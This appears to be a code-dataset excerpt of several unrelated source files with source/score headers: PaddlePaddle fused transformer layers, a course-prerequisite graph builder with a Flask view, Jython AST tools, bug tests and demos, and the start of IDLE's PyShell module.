output = multi_head_attn(query, None, None, attn_mask=attn_mask) # [2, 4, 128]
"""
def __init__(self,
embed_dim,
num_heads,
dropout_rate=0.5,
attn_dropout_rate=0.5,
kdim=None,
vdim=None,
normalize_before=False,
need_weights=False,
weight_attr=None,
bias_attr=None,
name=None):
super(FusedMultiHeadAttention, self).__init__()
        assert embed_dim > 0, ("Expected embed_dim to be greater than 0, "
                               "but received {}".format(embed_dim))
        assert num_heads > 0, ("Expected num_heads to be greater than 0, "
                               "but received {}".format(num_heads))
attn_dropout_rate = dropout_rate if attn_dropout_rate is None else attn_dropout_rate
self.normalize_before = normalize_before
self._dtype = self._helper.get_default_dtype()
self._weight_attr = weight_attr
self._bias_attr = bias_attr
self.head_dim = embed_dim // num_heads
assert self.head_dim * num_heads == embed_dim, "embed_dim must be divisible by num_heads"
assert need_weights == False, "Only support need_weight is False now."
self.qkv_weight = self.create_parameter(
shape=[3, num_heads, self.head_dim, embed_dim],
attr=self._weight_attr,
dtype=self._dtype,
is_bias=False)
self.qkv_bias = self.create_parameter(
shape=[3, num_heads, self.head_dim],
attr=self._bias_attr,
dtype=self._dtype,
is_bias=True)
self.linear_weight = self.create_parameter(
shape=[embed_dim, embed_dim],
attr=self._weight_attr,
dtype=self._dtype,
is_bias=False)
self.linear_bias = self.create_parameter(
shape=[embed_dim],
attr=self._bias_attr,
dtype=self._dtype,
is_bias=True)
self.pre_ln_scale = self.create_parameter(
attr=self._weight_attr,
shape=[embed_dim],
default_initializer=Constant(value=1.0))
self.pre_ln_bias = self.create_parameter(
attr=self._bias_attr, shape=[embed_dim], is_bias=True)
self.ln_scale = self.create_parameter(
attr=self._weight_attr,
shape=[embed_dim],
default_initializer=Constant(value=1.0))
self.ln_bias = self.create_parameter(
attr=self._bias_attr, shape=[embed_dim], is_bias=True)
self.dropout_rate = dropout_rate
self.attn_dropout_rate = attn_dropout_rate
self.name = name
def forward(self, query, key=None, value=None, attn_mask=None, cache=None):
"""
Applies multi-head attention to map queries and a set of key-value pairs
to outputs.
Parameters:
query (Tensor): The queries for multi-head attention. It is a
tensor with shape `[batch_size, query_length, embed_dim]`. The
data type should be float32 or float64.
key (Tensor, optional): The keys for multi-head attention. It is
a tensor with shape `[batch_size, key_length, kdim]`. The
data type should be float32 or float64. If None, use `query` as
`key`. Default None.
value (Tensor, optional): The values for multi-head attention. It
is a tensor with shape `[batch_size, value_length, vdim]`.
The data type should be float32 or float64. If None, use `query` as
`value`. Default None.
            attn_mask (Tensor, optional): A tensor used in multi-head attention
                to prevent attention to some unwanted positions, usually the
                paddings or the subsequent positions. It is a tensor with shape
broadcasted to `[batch_size, n_head, sequence_length, sequence_length]`.
When the data type is bool, the unwanted positions have `False`
values and the others have `True` values. When the data type is
int, the unwanted positions have 0 values and the others have 1
values. When the data type is float, the unwanted positions have
`-INF` values and the others have 0 values. It can be None when
nothing wanted or needed to be prevented attention to. Default None.
cache (MultiHeadAttention.Cache|MultiHeadAttention.StaticCache, optional):
Now, only None is supported. Default None.
Returns:
Tensor|tuple: It is a tensor that has the same shape and data type \
as `query`, representing attention output.
"""
if attn_mask is not None:
# Support bool or int mask
attn_mask = _convert_attention_mask(attn_mask, query.dtype)
assert cache == None, "Only support cache is None now."
out = incubate_f.fused_multi_head_attention(
x=query,
qkv_weight=self.qkv_weight,
linear_weight=self.linear_weight,
pre_layer_norm=self.normalize_before,
pre_ln_scale=self.pre_ln_scale,
pre_ln_bias=self.pre_ln_bias,
ln_scale=self.ln_scale,
ln_bias=self.ln_bias,
pre_ln_epsilon=1e-05,
qkv_bias=self.qkv_bias,
linear_bias=self.linear_bias,
attn_mask=attn_mask,
dropout_rate=self.dropout_rate,
attn_dropout_rate=self.attn_dropout_rate,
ln_epsilon=1e-05)
return out
class FusedFeedForward(Layer):
"""
Parameters:
d_model (int): The expected feature size in the input and output.
dim_feedforward (int): The hidden layer size.
        dropout_rate (float, optional): The dropout probability used in pre-process
            and post-process. Default 0.1
        activation (str, optional): The activation function. Default relu.
        act_dropout_rate (float, optional): The dropout probability after activation.
            If None, use the value of `dropout_rate`. Default None
        normalize_before (bool, optional): Indicate whether to put layer normalization
            into preprocessing or postprocessing. Default False
        weight_attr (ParamAttr, optional): The attribute for the learnable weight of this layer.
            The default value is None and the weight will be initialized to zero. For detailed
            information, please refer to paddle.ParamAttr.
        bias_attr (ParamAttr|bool, optional): The attribute for the learnable bias of this layer.
            If it is set to False, no bias will be added to the output. If it is set to None or one
            kind of ParamAttr, a bias parameter will be created according to ParamAttr. For detailed
            information, please refer to paddle.ParamAttr. The default value is None and the bias
            will be initialized to zero.
Examples:
.. code-block:: python
# required: gpu
import paddle
from paddle.incubate.nn import FusedFeedForward
fused_feedforward_layer = FusedFeedForward(8, 8)
x = paddle.rand((1, 8, 8))
out = fused_feedforward_layer(x)
print(out.numpy().shape)
# (1, 8, 8)
"""
def __init__(self,
d_model,
dim_feedforward,
dropout_rate=0.1,
activation="relu",
act_dropout_rate=None,
normalize_before=False,
weight_attr=None,
bias_attr=None):
super(FusedFeedForward, self).__init__()
        assert d_model > 0, (
            "Expected d_model to be greater than 0, but received {}".format(
                d_model))
        assert dim_feedforward > 0, (
            "Expected dim_feedforward to be greater than 0, but received {}".
            format(dim_feedforward))
self._dtype = self._helper.get_default_dtype()
self._d_model = d_model
self._dim_feedforward = dim_feedforward
self._dropout_rate = dropout_rate
self._act_dropout_rate = dropout_rate if act_dropout_rate is None else act_dropout_rate
self._act_method = activation
self._normalize_before = normalize_before
self._linear1_weight = self.create_parameter(
shape=[d_model, dim_feedforward],
attr=weight_attr,
dtype=self._dtype,
is_bias=False)
self._linear1_bias = self.create_parameter(
shape=[dim_feedforward],
attr=bias_attr,
dtype=self._dtype,
is_bias=True)
self._linear2_weight = self.create_parameter(
shape=[dim_feedforward, d_model],
attr=weight_attr,
dtype=self._dtype,
is_bias=False)
self._linear2_bias = self.create_parameter(
shape=[d_model], attr=bias_attr, dtype=self._dtype, is_bias=True)
self._ln1_scale = self.create_parameter(
shape=[d_model],
attr=None,
is_bias=False,
default_initializer=Constant(1.0))
self._ln1_bias = self.create_parameter(
shape=[d_model], attr=None, is_bias=True)
self._ln2_scale = self.create_parameter(
shape=[d_model],
attr=None,
is_bias=False,
default_initializer=Constant(1.0))
self._ln2_bias = self.create_parameter(
shape=[d_model], attr=None, is_bias=True)
def forward(self, src, cache=None):
out = incubate_f.fused_feedforward(
src, self._linear1_weight, self._linear2_weight, self._linear1_bias,
self._linear2_bias, self._ln1_scale, self._ln1_bias,
self._ln2_scale, self._ln2_bias, self._dropout_rate,
self._act_dropout_rate, self._act_method, self._normalize_before)
return out
class FusedTransformerEncoderLayer(Layer):
"""
FusedTransformerEncoderLayer is composed of two sub-layers which are self (multi-head)
    attention and feedforward network. Before and after each sub-layer, pre-process
    and post-process would be applied on the input and output accordingly. If
    `normalize_before` is True, the pre-process is layer normalization and the
    post-process includes dropout and residual connection. Otherwise, there is no
    pre-process and the post-process includes dropout, residual connection and
    layer normalization.
Parameters:
d_model (int): The expected feature size in the input and output.
nhead (int): The number of heads in multi-head attention(MHA).
dim_feedforward (int): The hidden layer size in the feedforward network(FFN).
        dropout_rate (float, optional): The dropout probability used in pre-process
            and post-process of MHA and FFN sub-layer. Default 0.1
        activation (str, optional): The activation function in the feedforward
            network. Default relu.
        attn_dropout_rate (float, optional): The dropout probability used
            in MHA to drop some attention targets. If None, use the value of
            `dropout`. Default None
        act_dropout_rate (float, optional): The dropout probability used after FFN
            activation. If None, use the value of `dropout`. Default None
        normalize_before (bool, optional): Indicate whether to put layer normalization
            into preprocessing of MHA and FFN sub-layers. If True, the pre-process is
            layer normalization and the post-process includes dropout and residual
            connection. Otherwise, there is no pre-process and the post-process
            includes dropout, residual connection and layer normalization. Default False
weight_attr(ParamAttr|list|tuple, optional): To specify the weight parameter property.
If it is a list/tuple, `weight_attr[0]` would be used as `weight_attr` for
MHA, and `weight_attr[1]` would be used as `weight_attr` for linear in FFN.
Otherwise, MHA and FFN both use it as `weight_attr` to create parameters.
Default: None, which means the default weight parameter property is used.
See usage for details in :code:`ParamAttr` .
bias_attr (ParamAttr|list|tuple|bool, optional): To specify the bias parameter property.
If it is a list/tuple, `bias_attr[0]` would be used as `bias_attr` for
MHA, and `bias_attr[1]` would be used as `bias_attr` for linear in FFN.
Otherwise, MHA and FFN both use it as `bias_attr` to create parameters.
The `False` value means the corresponding layer would not have trainable
bias parameter. See usage for details in :code:`ParamAttr` . Default: None,
which means the default bias parameter property is used.
Examples:
.. code-block:: python
# required: gpu
import paddle
from paddle.incubate.nn import FusedTransformerEncoderLayer
# encoder input: [batch_size, src_len, d_model]
enc_input = paddle.rand((2, 4, 128))
# self attention mask: [batch_size, n_head, src_len, src_len]
attn_mask = paddle.rand((2, 2, 4, 4))
encoder_layer = FusedTransformerEncoderLayer(128, 2, 512)
enc_output = encoder_layer(enc_input, attn_mask) # [2, 4, 128]
"""
def __init__(self,
d_model,
nhead,
dim_feedforward,
dropout_rate=0.1,
activation="relu",
attn_dropout_rate=None,
act_dropout_rate=None,
normalize_before=False,
weight_attr=None,
bias_attr=None):
self._config = locals()
self._config.pop("self")
self._config.pop("__class__", None) # py3
super(FusedTransformerEncoderLayer, self).__init__()
        assert d_model > 0, ("Expected d_model to be greater than 0, "
                             "but received {}".format(d_model))
        assert nhead > 0, ("Expected nhead to be greater than 0, "
                           "but received {}".format(nhead))
        assert dim_feedforward > 0, (
            "Expected dim_feedforward to be greater than 0, "
            "but received {}".format(dim_feedforward))
attn_dropout_rate = dropout_rate if attn_dropout_rate is None else attn_dropout_rate
act_dropout_rate = dropout_rate if act_dropout_rate is None else act_dropout_rate
self.normalize_before = normalize_before
weight_attrs = _convert_param_attr_to_list(weight_attr, 2)
bias_attrs = _convert_param_attr_to_list(bias_attr, 2)
self.fused_attn = FusedMultiHeadAttention(
d_model,
nhead,
dropout_rate=attn_dropout_rate,
weight_attr=weight_attrs[0],
bias_attr=bias_attrs[0])
self.ffn = FusedFeedForward(
d_model,
dim_feedforward,
dropout_rate=dropout_rate,
act_dropout_rate=act_dropout_rate,
normalize_before=self.normalize_before,
weight_attr=weight_attrs[1],
bias_attr=bias_attrs[1])
def forward(self, src, src_mask=None, cache=None):
"""
Applies a Transformer encoder layer on the input.
Parameters:
src (Tensor): The input of Transformer encoder layer. It is
a tensor with shape `[batch_size, sequence_length, d_model]`.
The data type should be float32 or float64.
            src_mask (Tensor, optional): A tensor used in multi-head attention
                to prevent attention to some unwanted positions, usually the
                paddings or the subsequent positions. It is a tensor with shape
broadcasted to `[batch_size, n_head, sequence_length, sequence_length]`.
When the data type is bool, the unwanted positions have `False`
values and the others have `True` values. When the data type is
int, the unwanted positions have 0 values and the others have 1
values. When the data type is float, the unwanted positions have
`-INF` values and the others have 0 values. It can be None when
nothing wanted or needed to be prevented attention to. Default None.
cache (Tensor, optional): It is an instance of `MultiHeadAttention.Cache`.
See `TransformerEncoderLayer.gen_cache` for more details. It is
only used for inference and should be None for training. Default
None.
Returns:
Tensor|tuple: It is a tensor that has the same shape and data type \
as `enc_input`, representing the output of Transformer encoder \
layer. Or a tuple if `cache` is not None, except for encoder \
layer output, the tuple includes the new cache which is same \
as input `cache` argument but `incremental_cache` has an \
incremental length. See `MultiHeadAttention.gen_cache` and \
`MultiHeadAttention.forward` for more details.
"""
src_mask = _convert_attention_mask(src_mask, src.dtype)
if cache is None:
attn_out = self.fused_attn(src, attn_mask=src_mask)
else:
attn_out, incremental_cache = self.fused_attn(
src, attn_mask=src_mask, cache=cache)
ffn_out = self.ffn(attn_out)
return ffn_out if cache is None else (ffn_out, incremental_cache)
class FusedTransformer(Layer):
"""
A Transformer model composed of an instance of `TransformerEncoder` and an
instance of `TransformerDecoder`. While the embedding layer and output layer
are not included.
Please refer to `Attention is all you need <http://papers.nips.cc/paper/7181-attention-is-all-you-need.pdf>`_ ,
and see `TransformerEncoder` and `TransformerDecoder` for more details.
    Users can configure the model architecture with corresponding parameters.
    Note the usage of `normalize_before` representing where to apply layer
    normalization (in pre-process or post-process of multi-head attention or FFN),
    and some transformer-like models are different on this, such as
`BERT <https://arxiv.org/abs/1810.04805>`_ and `GPT2 <https://d4mucfpksywv.cloudfront.net/better-language-models/language-models.pdf>`_ .
The default architecture here places layer normalization in post-process and
applies another layer normalization on the output of last encoder/decoder layer.
Parameters:
d_model (int, optional): The expected feature size in the encoder/decoder input
and output. Default 512
nhead (int, optional): The number of heads in multi-head attention(MHA). Default 8
num_encoder_layers (int, optional): The number of layers in encoder. Default 6
num_decoder_layers (int, optional): The number of layers in decoder. Default 6
dim_feedforward (int, optional): The hidden layer size in the feedforward network(FFN). Default 2048
        dropout (float, optional): The dropout probability used in pre-process
            and post-process of MHA and FFN sub-layer. Default 0.1
        activation (str, optional): The activation function in the feedforward
            network. Default relu.
        attn_dropout (float, optional): The dropout probability used
            in MHA to drop some attention targets. If None, use the value of
            `dropout`. Default None
        act_dropout (float, optional): The dropout probability used after FFN
            activation. If None, use the value of `dropout`. Default None
        normalize_before (bool, optional): Indicate whether to put layer normalization
            into preprocessing of MHA and FFN sub-layers. If True, the pre-process is
            layer normalization and the post-process includes dropout and residual
            connection. Otherwise, there is no pre-process and the post-process
            includes dropout, residual connection and layer normalization. Default False
weight_attr(ParamAttr|list|tuple, optional): To specify the weight parameter property.
If it is a list/tuple, the length of `weight_attr` could be 1, 2 or 3. If it is 3,
`weight_attr[0]` would be used as `weight_attr` for self attention, `weight_attr[1]`
would be used as `weight_attr` for cross attention of `TransformerDecoder`,
and `weight_attr[2]` would be used as `weight_attr` for linear in FFN.
            If it is 2, `weight_attr[0]` would be used as `weight_attr` both for self attention
            and cross attention and `weight_attr[1]` would be used as `weight_attr` for
            linear in FFN. If it is 1, `weight_attr[0]` would be used as `weight_attr`
            for self attention, cross attention and linear in FFN. Otherwise,
            the three sub-layers all use it as `weight_attr` to create parameters.
Default: None, which means the default weight parameter property is used.
See usage for details
in :code:`ParamAttr` .
bias_attr (ParamAttr|list|tuple|bool, optional): To specify the bias parameter property.
If it is a list/tuple, the length of `bias_attr` could be 1, 2 or 3. If it is 3,
`bias_attr[0]` would be used as `bias_attr` for self attention, `bias_attr[1]`
would be used as `bias_attr` for cross attention of `TransformerDecoder`,
and `bias_attr[2]` would be used as `bias_attr` for linear in FFN.
            If it is 2, `bias_attr[0]` would be used as `bias_attr` both for self attention
            and cross attention and `bias_attr[1]` would be used as `bias_attr` for
            linear in FFN. If it is 1, `bias_attr[0]` would be used as `bias_attr`
            for self attention, cross attention and linear in FFN. Otherwise,
            the three sub-layers all use it as `bias_attr` to create parameters.
The `False` value means the corresponding layer would not have trainable
bias parameter. See usage for details in :code:`ParamAttr` .
Default: None,which means the default bias parameter property is used.
custom_encoder (Layer, optional): If custom encoder is provided, use it as the encoder.
Default None
custom_decoder (Layer, optional): If custom decoder is provided, use it as the decoder.
Default None
Examples:
.. code-block:: python
import paddle
from paddle.nn import Transformer
# src: [batch_size, tgt_len, d_model]
enc_input = paddle.rand((2, 4, 128))
# tgt: [batch_size, src_len, d_model]
dec_input = paddle.rand((2, 6, 128))
# src_mask: [batch_size, n_head, src_len, src_len]
enc_self_attn_mask = paddle.rand((2, 2, 4, 4))
# tgt_mask: [batch_size, n_head, tgt_len, tgt_len]
dec_self_attn_mask = paddle.rand((2, 2, 6, 6))
# memory_mask: [batch_size, n_head, tgt_len, src_len]
cross_attn_mask = paddle.rand((2, 2, 6, 4))
transformer = Transformer(128, 2, 4, 4, 512)
output = transformer(enc_input,
dec_input,
enc_self_attn_mask,
dec_self_attn_mask,
cross_attn_mask) # [2, 6, 128]
"""
def __init__(self,
d_model=512,
nhead=8,
num_encoder_layers=6,
num_decoder_layers=6,
dim_feedforward=2048,
dropout=0.1,
activation="relu",
attn_dropout=None,
act_dropout=None,
normalize_before=False,
weight_attr=None,
bias_attr=None,
custom_encoder=None,
custom_decoder=None):
        super(FusedTransformer, self).__init__()
raise NotImplementedError()
def forward(self, src, tgt, src_mask=None, tgt_mask=None, memory_mask=None):
raise NotImplementedError()
```
|
{
"source": "jeff4elee/course_path",
"score": 3
}
|
#### File: course_path/home/dag_analyzer.py
```python
from catalog_scraper import extract_catalog_dict, write_catalog, read_catalog
import json
import networkx as nx
from networkx.readwrite import json_graph
import os.path
if(os.path.isfile('courses.csv')):
course_catalog = read_catalog('courses.csv')
else:
course_ids, course_titles, course_pre = extract_catalog_dict(record=True)
write_catalog(course_ids, course_titles, course_pre, record=True)
course_catalog = read_catalog('courses.csv')
courses = {}
"""
ids, titles, pres = extract_catalog_dict(record=False)
catalog_info = zip(ids, titles, pres)
course_catalog = {}
for x, y, z in catalog_info:
course_catalog[x.lower().replace(" ", "")] = (x, y, z)
print course_catalog
"""
def insert_into_course(key, value):
if not type(value) is dict:
raise TypeError("Value is not a dictionary!")
if key not in courses:
courses[key] = value
else:
courses[key].update(value)
def dfs(course_info):
"""
dfs(course_info)
course_info -> 3-tuple in the format (string, string, list of strings)
updates the courses dictionary to include the specified course and its prereqs
"""
#gets the id of the course
i = course_info[0]
#check if the courses dict already has the course path defined
if i in courses:
return {i: courses[i]}
    #retrieve the list of prereqs for the course
    pr = [p for p in course_info[2]]
    # memoization table: check if keys in dict already exist
for p in course_info[2]:
if(isinstance(p, list)):
insert_into_course(i, {" or ".join(p): p})
pr.remove(p)
elif p in courses:
insert_into_course(i, {p: courses[p]})
pr.remove(p)
# check if there are no prereqs (empty list)
if not course_info[2]:
courses[i] = i
return {i : i}
#stack consisting of the prerequisites
course_stack = [pr]
    #stack for dfs to reproduce a DAG
while(course_stack):
curr_p = course_stack.pop()
#iterate through the id of each prereq in the list
for curr_i in curr_p:
#check if the id is in the courses dict or the course_catalog dict
            #courses keys are formatted like 'CSE 100'
#course_catalog keys are formatted like 'CSE100' <-- notice no space
if curr_i not in courses and curr_i.upper().replace(" ", "") in course_catalog:
#retrieve the course_info from the catalog with the matching id
c_info = course_catalog[curr_i.upper().replace(" ", "")]
#retrieve prereq dictionary of current prereq
prereqs = dfs(c_info)
#merge the prereq dictionary to the courses's current prereq dict
insert_into_course(i, prereqs)
#memoization in action
elif curr_i in courses:
insert_into_course(i, {curr_i: courses[curr_i]})
#edge case, courses catalog doesn't contain the prereq
elif curr_i.upper().replace(" ", "") not in course_catalog:
insert_into_course(i, {curr_i : curr_i})
return {i: courses[i]}
def determine_path(course):
course_path = dfs(course)
path = "Root: " + course[0] + ' - ' + course[1]
#print_path(course_path[course[0]], 4)
return calculate_path(course_path[course[0]], 3, path)
def print_path(dict_path, spaces, str_format=None):
if not str_format:
str_format = "Child:"
if type(dict_path) is str:
return
if type(dict_path) is list:
for item in dict_path:
try:
course = course_catalog[item.upper().replace(" ", "")]
print_path(dfs(course), spaces+3, "Or Root:")
except:
continue
else:
for key in dict_path.iterkeys():
print " "*spaces + str_format, key
print_path(dict_path[key], spaces+3)
def calculate_path(dict_path, spaces, path, str_format=None):
"""
calculate_path(dict_path, spaces, path, str_format=None)
dict_path --> dictionary of the course and its prerequisites
spaces --> spacing of the format
path --> initial string to set before the path display
    str_format --> label prefix used for child entries in the path display
returns a string representation (used for html) of the specified
dictionary path (a course and its prerequisites)
"""
if not str_format:
str_format = "Child:"
#str indicates no further path, so return the path as is
if type(dict_path) is str:
return path
#list indicates 'or prerequisites'
#parse and calculate each individual path with a special format
if type(dict_path) is list:
for item in dict_path:
try:
course = course_catalog[item.upper().replace(" ", "")]
path += calculate_path(dfs(course), spaces, " ", "Or Root:")
except:
continue
#regular dictionary path, continue recursively (dfs)
else:
for key in dict_path.iterkeys():
path += "<br>" + " "*spaces + str_format + " " + key
path += calculate_path(dict_path[key], spaces+3, " ")
return path
def generate_graph(course):
G = nx.DiGraph()
course_path = dfs(course)
# path = "Root: " + course[0] + ' - ' + course[1]
G.add_node(course[0], name=course[0], group="Root Course")
def generate_path(G, parent, dict_path):
if type(dict_path) is str:
return
if type(dict_path) is list:
for item in dict_path:
try:
G.add_node(item, name=item, group="Or Courses")
G.add_edge(parent, item)
course = course_catalog[item.upper().replace(" ", "")]
generate_path(G, item, dfs(course))
except:
continue
else:
# G.add_edges_from([(parent, key) for key in dict_path.iterkeys()])
for key in dict_path.iterkeys():
G.add_node(key, name=key)
G.add_edge(parent, key)
generate_path(G, key, dict_path[key])
#print_path(course_path[course[0]], 4)
generate_path(G, course[0], course_path[course[0]])
d = json_graph.node_link_data(G) # node-link format to serialize
json.dump(d, open('home/static/force.json','w'))
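if __name__ == '__main__':
    # Minimal usage sketch: 'CSE100' is only an illustrative catalog key; it
    # assumes that course id was found by the scraper and is present in
    # course_catalog, and that the relative output path used above exists.
    key = 'CSE100'
    if key in course_catalog:
        print determine_path(course_catalog[key])
        generate_graph(course_catalog[key])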
```
#### File: course_path/home/views.py
```python
from home import app
from catalog_scraper import read_catalog
from flask import render_template, flash, redirect, session, url_for, request, g
from .forms import CourseForm
from dag_analyzer import generate_graph, course_catalog
@app.route('/', methods=['POST', 'GET'])
@app.route('/index', methods=['POST', 'GET'])
def index():
form = CourseForm()
if form.validate_on_submit():
response = request.form.get('course')
course_id = response.upper().replace(" ", "")
path = generate_graph(course_catalog[course_id])
return render_template('index.html',
form=form,
read=True)
return render_template('index.html',
form=form)
```
|
{
"source": "jeff5/jython-whinchat",
"score": 3
}
|
#### File: jython-whinchat/ast/astdump.py
```python
import os
import sys
import globwalk
import astview
def makepath(path):
"""
from <EMAIL> 2002/03/18
See: http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/117243
"""
from os import makedirs
from os.path import normpath,dirname,exists,abspath
dpath = normpath(dirname(path))
if not exists(dpath): makedirs(dpath)
return normpath(abspath(path))
def main(code_path, output_dir, testfile=False):
if os.path.exists(output_dir):
print "%s already exists, exiting" % output_dir
sys.exit(1)
os.mkdir(output_dir)
if testfile:
pyfiles = [f.rstrip() for f in file(code_path)]
elif os.path.isdir(code_path):
pyfiles = globwalk.GlobDirectoryWalker(code_path, "*.py")
else:
pyfiles = [code_path]
for pyfile in pyfiles:
import pprint
path = pyfile.split(os.path.sep)
print "%s to %s: %s" % (pyfile, output_dir, os.path.join(output_dir, *path))
fh = open(makepath(os.path.join(output_dir, *path)), 'w')
print fh
pprint.pprint(astview.tree(pyfile), fh)
if __name__ == '__main__':
import sys
import getopt
usage = """\
Usage: python %s [-t] code_path output_dir
output_dir must not exist (it will be created)
unless -t is specified, if codepath is a file test it, if codepath is a directory
test all .py files in and below that directory.
""" % sys.argv[0]
testfile = False
try:
opts, args = getopt.getopt(sys.argv[1:], 'th')
except:
print usage
sys.exit(1)
for o, v in opts:
if o == '-h':
print usage
sys.exit(0)
if o == '-t':
testfile = True
if len(args) < 2 or len(args) > 3:
print usage
sys.exit(1)
main(args[0], args[1], testfile)
```
#### File: jython-whinchat/ast/astlib2.py
```python
import _ast
import os
import globwalk
def lispify_ast(node):
return tuple(lispify_ast2(node))
def lispify_ast2(node):
yield node.__class__.__name__
try:
for field in node._fields:
yield tuple(lispify_field(field, getattr(node, field)))
except:
pass
def lispify_field(field, child):
yield field
if not isinstance(child, list):
children = [child]
else:
children = child
for node in children:
if isinstance(node, _ast.AST):
yield lispify_ast(node)
else:
if isinstance(node, float):
#stringify floats so they match Java's float representation better
yield str(node)
else:
yield node
if __name__ == '__main__':
import sys
from pprint import pprint
code_path = sys.argv[1]
ast = compile(open(code_path).read(), code_path, "exec", _ast.PyCF_ONLY_AST)
lispified = lispify_ast(ast)
pprint(lispified)
```
#### File: jython-whinchat/ast/globwalk.py
```python
import os
import fnmatch
class GlobDirectoryWalker:
# a forward iterator that traverses a directory tree
def __init__(self, directory, pattern="*"):
self.stack = [directory]
self.pattern = pattern
self.files = []
self.index = 0
def __getitem__(self, index):
while 1:
try:
file = self.files[self.index]
self.index = self.index + 1
except IndexError:
# pop next directory from stack
self.directory = self.stack.pop()
self.files = os.listdir(self.directory)
self.index = 0
else:
# got a filename
fullname = os.path.join(self.directory, file)
if os.path.isdir(fullname) and not os.path.islink(fullname):
self.stack.append(fullname)
if fnmatch.fnmatch(file, self.pattern):
return fullname
#for file in GlobDirectoryWalker(".", "*.py"):
# print file
```
#### File: jython-whinchat/bugtests/test338m.py
```python
class test338m(test338j1):
def getDescription(self):
desc = test338j1.getDescription(self) # Superclass call
return "Foo_" + desc
```
#### File: jython-whinchat/bugtests/test349.py
```python
import support
import java, time, sys, cStringIO
class A:
def __del__(self):
raise KeyError, "dummy"
try:
sys.stderr = cStringIO.StringIO()
A()
java.lang.System.gc()
time.sleep(2)
finally:
v = sys.stderr.getvalue()
sys.stderr = sys.__stderr__
support.compare(v, "Exception KeyError: .* ignored")
```
#### File: jython-whinchat/bugtests/test368.py
```python
import support
from java.io import *
from org.python.util import *
SINGL= None
#SINGL= Ellipsis
class Test(Serializable):
def __init__(self):
self.attr = SINGL
def test(self):
if self.attr is not SINGL:
raise support.TestError("Singleton not unique")
if self.attr != SINGL:
raise support.TestError("Singleton not unique")
def load(path):
file = File(path)
fileIn = FileInputStream(file)
pyIn = PythonObjectInputStream(fileIn)
pyObj = pyIn.readObject()
pyIn.close()
return pyObj
def save(obj, path):
fileOut = FileOutputStream(path)
objOut = ObjectOutputStream(fileOut)
objOut.writeObject(obj)
objOut.flush()
objOut.close()
#print "Testing initial object..."
a = Test()
a.test()
save(a, "test368.out")
b = load("test368.out")
#print "Testing deserialized object..."
b.test()
```
#### File: jython-whinchat/bugtests/test380.py
```python
import support
d = {}
import java
clash_id = java.lang.System.identityHashCode
for i in xrange(100000):
s = ['test',i]
j = clash_id(s)
if d.has_key(j):
break
d[j] = s
s1 = s
s0 = d[j]
data = [s0,s1,s0]
#print data
import pickle
import cPickle
def check(ctxt,data0,data1):
if data0 != data1:
raise support.TestError,"data corrupted in %s because of id clashes: %s != %s" % (ctxt.__name__,data0,data1)
def pik_test(pikmod,data):
pik =pikmod.dumps(data,1)
data1 = pikmod.loads(pik)
check(pikmod,data,data1)
pik_test(cPickle,data)
pik_test(pickle,data)
import copy
check(copy.deepcopy,data,copy.deepcopy(data))
```
#### File: jython-whinchat/bugtests/test382.py
```python
import sys
def check(tb,expt_lines):
assert tb.tb_frame is sys._getframe(1),"catching frame should be included"
lines=[]
while tb:
lines.append(tb.tb_lineno)
tb = tb.tb_next
assert expt_lines==lines, "bogus line numbers: %s vs. expected %s" % (lines,expt_lines)
def f():
try:
raise KeyError # 17
except:
raise
try:
f() # 22
except:
t,e,tb = sys.exc_info()
check(tb,[22,17])
try:
f() # 28
except KeyError,e:
t,e,tb = sys.exc_info()
check(tb,[28,17])
try:
1/0 # 34
except:
t,e,tb = sys.exc_info()
check(tb,[34])
try:
try:
1/0 # 41
except:
raise
except:
t,e,tb = sys.exc_info()
check(tb,[41])
```
#### File: applet/deprecated/ChoiceDemo.py
```python
from java import awt, applet
class ChoiceDemo(applet.Applet):
def init(self):
self.choices = awt.Choice(itemStateChanged=self.change)
for item in ['ichi', 'ni', 'san', 'yon']:
self.choices.addItem(item)
self.label = awt.Label()
self.change()
self.add(self.choices)
self.add(self.label)
def change(self, event=None):
selection = self.choices.selectedIndex, self.choices.selectedItem
self.label.text = 'Item #%d selected. Text = "%s".' % selection
if __name__ == '__main__':
import pawt
pawt.test(ChoiceDemo())
```
#### File: Demo/bean/TempConverter.py
```python
import java
class TempConverter(java.lang.Object):
def __init__(self):
self.setFahrenheit(0.0)
def setFahrenheit(self, degrees):
"@sig public void setFahrenheit(double degrees)"
self.f = degrees
self.c = (degrees-32.)/1.8
def getFahrenheit(self):
"@sig public double getFahrenheit()"
return self.f
def setCelsius(self, degrees):
"@sig public void setCelsius(double degrees)"
self.c = degrees
self.f = degrees*1.8+32.
def getCelsius(self):
"@sig public double getCelsius()"
return self.c
def __repr__(self):
return '<%.2g degrees fahrenheit == %.2g celsius>' % (self.f, self.c)
if __name__ == '__main__':
c = TempConverter()
print c
c.setCelsius(100)
print c
c.setCelsius(0)
print c
c.setFahrenheit(212)
print c
```
#### File: 2.7/idlelib/PyShell.py
```python
import os
import os.path
import sys
import string
import getopt
import re
import socket
import time
import threading
import traceback
import types
import io
import linecache
from code import InteractiveInterpreter
try:
from Tkinter import *
except ImportError:
print>>sys.__stderr__, "** IDLE can't import Tkinter. " \
"Your Python may not be configured for Tk. **"
sys.exit(1)
import tkMessageBox
from idlelib.EditorWindow import EditorWindow, fixwordbreaks
from idlelib.FileList import FileList
from idlelib.ColorDelegator import ColorDelegator
from idlelib.UndoDelegator import UndoDelegator
from idlelib.OutputWindow import OutputWindow
from idlelib.configHandler import idleConf
from idlelib import idlever
from idlelib import rpc
from idlelib import Debugger
from idlelib import RemoteDebugger
from idlelib import macosxSupport
IDENTCHARS = string.ascii_letters + string.digits + "_"
HOST = '127.0.0.1' # python execution server on localhost loopback
PORT = 0 # someday pass in host, port for remote debug capability
try:
from signal import SIGTERM
except ImportError:
SIGTERM = 15
# Override warnings module to write to warning_stream. Initialize to send IDLE
# internal warnings to the console. ScriptBinding.check_syntax() will
# temporarily redirect the stream to the shell window to display warnings when
# checking user's code.
global warning_stream
warning_stream = sys.__stderr__
try:
import warnings
except ImportError:
pass
else:
def idle_showwarning(message, category, filename, lineno,
file=None, line=None):
if file is None:
file = warning_stream
try:
file.write(warnings.formatwarning(message, category, filename,
lineno, line=line))
except IOError:
pass ## file (probably __stderr__) is invalid, warning dropped.
warnings.showwarning = idle_showwarning
def idle_formatwarning(message, category, filename, lineno, line=None):
"""Format warnings the IDLE way"""
s = "\nWarning (from warnings module):\n"
s += ' File \"%s\", line %s\n' % (filename, lineno)
if line is None:
line = linecache.getline(filename, lineno)
line = line.strip()
if line:
s += " %s\n" % line
s += "%s: %s\n>>> " % (category.__name__, message)
return s
